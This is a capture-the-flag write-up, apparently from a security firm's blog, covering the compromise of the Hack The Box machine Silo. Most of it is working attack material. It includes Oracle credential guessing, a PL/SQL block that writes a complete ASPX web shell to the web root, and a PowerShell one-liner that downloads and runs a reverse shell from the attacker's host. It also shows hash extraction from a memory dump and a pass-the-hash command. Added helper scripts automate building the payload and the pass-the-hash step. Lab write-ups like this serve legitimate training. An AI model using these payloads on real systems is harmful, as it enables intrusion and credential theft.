Road to OSCP - Hack The Box Write Up - Silo

2 Feb 2020

Hack the Box is an online platform to test and advance your skills in penetration testing and cyber security.

In this series of articles we show how junior evaluators complete some Hack The Box machines on their road to OSCP, a well-known and respected certification that is required for many top cybersecurity positions. Certified OSCPs are able to identify existing vulnerabilities and execute organized attacks in a controlled and focused manner. They can leverage or modify existing exploit code to their advantage, perform network pivoting and data exfiltration, and compromise systems that suffer from poor configurations.

Let's start with the fun!

Silo

Initial Foothold

Nmap shows an Oracle TNS listener on port 1521, version 11.2.0.2.0. A quick search tells us that this listener version is affected by TNS Listener poisoning (CVE-2012-1675): an unauthenticated attacker can register a rogue database instance with the listener and have client connections routed through it.

The standard tool for attacking Oracle from the outside is odat (Oracle Database Attacking Tool), which has a module for exactly this.

We can check whether the target is vulnerable with odat tnspoison -s $SERVER -d $SID --test-module. First, however, we need the $SID (Oracle System Identifier) of a database instance behind the listener.

Thankfully, with odat -h we find it has a sidguesser module: odat sidguesser -s 10.10.10.82.

[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...
[+] 'XEXDB' is a valid SID. Continue...
100% |######################################################################################################################################################################################################################| Time: 00:02:20
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |######################################################################################################################################################################################################################| Time: 00:00:04
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue...
100% |######################################################################################################################################################################################################################| Time: 00:02:07
[+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB

XE is the default SID of Oracle Database Express Edition, so this is a stock XE install. Now we can check whether it is vulnerable: odat tnspoison -s 10.10.10.82 -d XE --test-module

[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning

Time to exploit it: odat tnspoison -s 10.10.10.82 -d XE --poison. Unfortunately, the poison module was broken at the time by odat's recent port to Python 3, and the Python 2 version did not work either. Bear in mind that TNS poisoning is a connection-hijacking attack: it only pays off when real clients connect through the poisoned listener, so on a lab box with no other users it would be a poor path even with working tooling.

Find Another Path

Let's try guessing database credentials instead: odat passwordguesser -s 10.10.10.82 -d XE.

Nothing hits. Looking at the default wordlist, /usr/share/odat/accounts/accounts.txt, every entry is upper case. Since 11g, however, Oracle passwords are case sensitive (SEC_CASE_SENSITIVE_LOGON defaults to TRUE), so lower-case defaults such as tiger are never tried.

After a lot of trial and error, what worked was:

  1. Get a better wordlist from SecLists.
  2. Replace the : separator with /, the user/pass format odat expects.
  3. Duplicate each line in lower case (a Vim macro does the job).
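The three steps above scripted, as an added example that is not part of the original write-up: the function takes a SecLists-style user:pass file and prints every pair in odat's user/pass form, once as written and once lower-cased, dropping duplicates. The sample lines used in the usage note are constructed.

```shell
#!/usr/bin/env sh
# Added example, not part of the original write-up: turn a SecLists-style
# "user:pass" list into the "user/pass" format odat's passwordguesser expects,
# emitting each pair as-is and lower-cased, because Oracle 11g passwords are
# case sensitive and most default lists are all upper case.
set -eu

expand_oracle_wordlist() {
    # $1: input file with one user:pass per line
    awk -F: 'NF >= 2 {
        # everything after the first ":" is the password, so passwords that
        # themselves contain ":" survive intact
        pass = substr($0, length($1) + 2)
        print $1 "/" pass
        print tolower($1) "/" tolower(pass)
    }' "$1" | awk '!seen[$0]++'   # drop pairs that were already lower case
}

# Usage: ./expand_oracle_wordlist.sh accounts.txt > accounts_case.txt
# then point odat's passwordguesser at the new file (see
# odat passwordguesser -h for the accounts-file option).
if [ "${1:-}" ]; then
    expand_oracle_wordlist "$1"
fi
```

Running it over a constructed file containing SCOTT:TIGER and SYSTEM:MANAGER yields SCOTT/TIGER, scott/tiger, SYSTEM/MANAGER and system/manager, which is exactly the list that turns up the credentials below.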

That turns up the classic Oracle demo account: scott/tiger.

Connect to the database with sqlplus: sqlplus scott/tiger@10.10.10.82:1521/XE as sysdba. Connecting as sysdba matters: the file write below needs privileges a plain database user does not have.

User

Our objective is to drop an ASPX web shell on the server through sqlplus, using UTL_FILE. Grab one from Kali: /usr/share/webshells/aspx/cmdasp.aspx.

UTL_FILE is picky about how the file is written: utl_file.fopen opens the file with a default max_linesize of 1024 bytes, so each put_line call has to stay under that (the limit can be raised to 32767 by passing it as fopen's fourth argument). The simplest route is to keep the whole shell under roughly 1000 characters and write it as a single line.

So we delete the comments and styles, then collapse the file with sed -z 's/\n//g' cmdasp.aspx. Any single quotes in the shell would have to be doubled ('') to survive inside the PL/SQL string literal; cmdasp.aspx only uses double quotes, so nothing needs escaping here. The final payload looks like this:

declare
    f utl_file.file_type;
    s varchar(5000) := '<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>';
begin
    f:= utl_file.fopen('/inetpub/wwwroot', 'peng.aspx', 'W');
    utl_file.put_line(f,s);
    utl_file.fclose(f);
end;
/

After running it, browsing to http://10.10.10.82/peng.aspx should bring up the web shell.
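The collapse-and-wrap step automated, as an added example that is not part of the original write-up: the function collapses a web shell onto one line, doubles single quotes for the PL/SQL literal, refuses to emit a line that would not fit UTL_FILE's default 1024-byte max_linesize, and prints the same UTL_FILE block as above. The target directory and file name are parameters; the sample shell in the usage note is constructed.

```shell
#!/usr/bin/env sh
# Added example, not part of the original write-up: wrap a web shell into the
# UTL_FILE PL/SQL block used above, collapsing it onto one line, escaping
# single quotes for the Oracle string literal, and refusing lines that would
# exceed utl_file.fopen's default max_linesize (1024 bytes, newline included).
set -eu

UTL_FILE_DEFAULT_MAX_LINESIZE=1024

# Collapse the file onto one line and escape it as a PL/SQL string literal.
# $1: path to the (already trimmed) web shell
oracle_literal_from_file() {
    tr -d '\n\r' < "$1" | sed "s/'/''/g"
}

# Print the PL/SQL block, or fail with status 2 if the collapsed line is too
# long for UTL_FILE's default line size.
# $1: web shell path, $2: directory on the target, $3: file name to create
build_utl_file_payload() {
    lit=$(oracle_literal_from_file "$1")
    len=$(tr -d '\n\r' < "$1" | wc -c | tr -d ' ')   # bytes actually written
    if [ "$len" -ge "$UTL_FILE_DEFAULT_MAX_LINESIZE" ]; then
        echo "collapsed shell is $len bytes; trim it or pass a larger max_linesize to fopen" >&2
        return 2
    fi
    fmt="declare
    f utl_file.file_type;
    s varchar2(32767) := '%s';
begin
    f := utl_file.fopen('%s', '%s', 'W');
    utl_file.put_line(f, s);
    utl_file.fclose(f);
end;
/
"
    printf "$fmt" "$lit" "$2" "$3"
}

# Usage: build_utl_file_payload cmdasp.aspx /inetpub/wwwroot peng.aspx \
#          | sqlplus 'scott/tiger@10.10.10.82:1521/XE as sysdba'
if [ $# -ge 3 ]; then
    build_utl_file_payload "$1" "$2" "$3"
fi
```

The length check is the part worth keeping even if you write the block by hand: a line that is too long makes put_line raise ORA-29285 (file write error) rather than silently truncating, and the web shell simply never appears.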

Reverse Shell

  1. Copy the Nishang reverse shell into the working directory as shell.ps1: cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 shell.ps1.
  2. Append the invocation to the bottom of the file so it fires when the script is loaded: Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.14 -Port 6969.
  3. Start a listener: ncat -lnvp 6969.
  4. Serve the script over HTTP: python3 -m http.server (port 8000 by default).
  5. From the web shell, download and execute it in memory: powershell -ExecutionPolicy Bypass "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.14:8000/shell.ps1')".

And we get a shell as iis apppool\defaultapppool.

Root

There is an odd file called Oracle issue.txt on Phineas' Desktop. It contains a Dropbox link and a password.

The password is not displayed correctly because of the console encoding of our shell. Base64-encode the file on the target and decode it on Kali:

# -Raw returns the whole file as one string instead of an array of lines
$fc = Get-Content "Oracle issue.txt" -Raw
# re-encode as UTF-8 bytes so the non-ASCII character survives transport
$fe = [System.Text.Encoding]::UTF8.GetBytes($fc)
[System.Convert]::ToBase64String($fe)

Decode it: echo -n "U3VwcG9ydCB2ZW5kb3IgZW5nYWdlZCB0byB0cm91Ymxlc2hvb3QgV2luZG93cyAvIE9yYWNsZSBwZXJmb3JtYW5jZSBpc3N1ZSAoZnVsbCBtZW1vcnkgZHVtcCByZXF1ZXN0ZWQpOiAgRHJvcGJveCBsaW5rIHByb3ZpZGVkIHRvIHZlbmRvciAoYW5kIHBhc3N3b3JkIHVuZGVyIHNlcGFyYXRlIGNvdmVyKS4gIERyb3Bib3ggbGluayAgaHR0cHM6Ly93d3cuZHJvcGJveC5jb20vc2gvNjlza3J5emZzemI3ZWxxL0FBRFpuUUViYnFEb0lmNUwyZDBQQnhFTmE/ZGw9MCAgbGluayBwYXNzd29yZDogwqMlSG04NjQ2dUMk" | base64 -d

The actual password is: £%Hm8646uC$.

We get a memory dump, SILO-20180105-221806.dmp, which we can analyse with Volatility.

Diving Into the Dump

Volatility needs a profile to parse the dump. Running systeminfo from our reverse shell tells us the host is 64-bit Windows Server 2012 R2, which corresponds to the Win2012R2x64 profile (without shell access, volatility -f SILO-20180105-221806.dmp imageinfo would suggest candidate profiles).

With that, the hashdump plugin pulls the local account hashes out of the in-memory SAM: volatility -f SILO-20180105-221806.dmp --profile Win2012R2x64 hashdump.

Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::

The Administrator NT hash is all we need for a pass-the-hash attack over SMB; pth-winexe spawns a shell with it, no cracking required: pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 //10.10.10.82 cmd

And we get a shell as: silo\administrator.
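A small parser for the hashdump output above, as an added example that is not part of the original write-up: it pulls one account's LM:NT pair out of pwdump-style lines (user:rid:lm:nt:::), validates the fields, refuses the empty-password NT hash (the Guest entry), warns when a real LM hash is stored, and prints the pth-winexe command used above. The three sample lines are the ones from the write-up, embedded so the script runs offline.

```shell
#!/usr/bin/env sh
# Added example, not part of the original write-up: extract an account's LM:NT
# hash pair from Volatility hashdump output and build the pth-winexe command.
set -eu

EMPTY_LM=aad3b435b51404eeaad3b435b51404ee   # LM hash when no LM hash is stored
EMPTY_NT=31d6cfe0d16ae931b73c59d7e0c089c0   # NT hash of an empty password

# Hashdump lines from the write-up, embedded as sample input.
SAMPLE_HASHDUMP='Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::'

# Print "lm:nt" for user $1 from hashdump lines on stdin (user:rid:lm:nt:::).
# Fails if the user is missing, a hash field is not 32 hex chars, or the NT
# hash is the empty-password hash (nothing to pass). Warns if an LM hash exists.
hash_pair_for() {
    pair=$(awk -F: -v u="$1" 'tolower($1) == tolower(u) { print $3 ":" $4; exit }' \
        | tr 'A-Z' 'a-z')
    [ -n "$pair" ] || { echo "no entry for $1" >&2; return 1; }
    case "$pair" in
        *[!0-9a-f:]*) echo "non-hex hash field for $1" >&2; return 1 ;;
    esac
    [ ${#pair} -eq 65 ] || { echo "bad hash length for $1" >&2; return 1; }
    nt=${pair#*:}
    lm=${pair%%:*}
    [ "$nt" != "$EMPTY_NT" ] || { echo "$1 has an empty password" >&2; return 1; }
    [ "$lm" = "$EMPTY_LM" ] || echo "note: $1 has an LM hash stored (weak, crackable)" >&2
    printf '%s\n' "$pair"
}

# Print the pass-the-hash command for user $1 against host $2.
pth_winexe_cmd() {
    pair=$(hash_pair_for "$1") || return 1
    printf "pth-winexe -U '%s%%%s' //%s cmd\n" "$1" "$pair" "$2"
}

# Usage: ./pth_from_hashdump.sh Administrator 10.10.10.82 < hashdump.txt
# or, on the embedded sample:
#   printf '%s\n' "$SAMPLE_HASHDUMP" | ./pth_from_hashdump.sh Administrator 10.10.10.82
if [ $# -ge 2 ]; then
    pth_winexe_cmd "$1" "$2"
fi
```

The two checks are the ones that save time in practice: a 31d6cfe0... NT hash means the account has no password (Guest here, and usually disabled), and an LM field other than aad3b435... means a real LM hash is stored and is cheap to crack.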

Ángel Guzmán/Junior evaluator

Bachelor's and Master's degrees in telecommunications from the University of Granada, specialized in telematics. Joined jtsec in November 2019 as a Junior cybersecurity evaluator.

Since joining jtsec, he has participated in several internal hardware hacking projects while also receiving training on the LINCE certification.

His main motivation is to learn, from small tools for his daily work to new technologies.

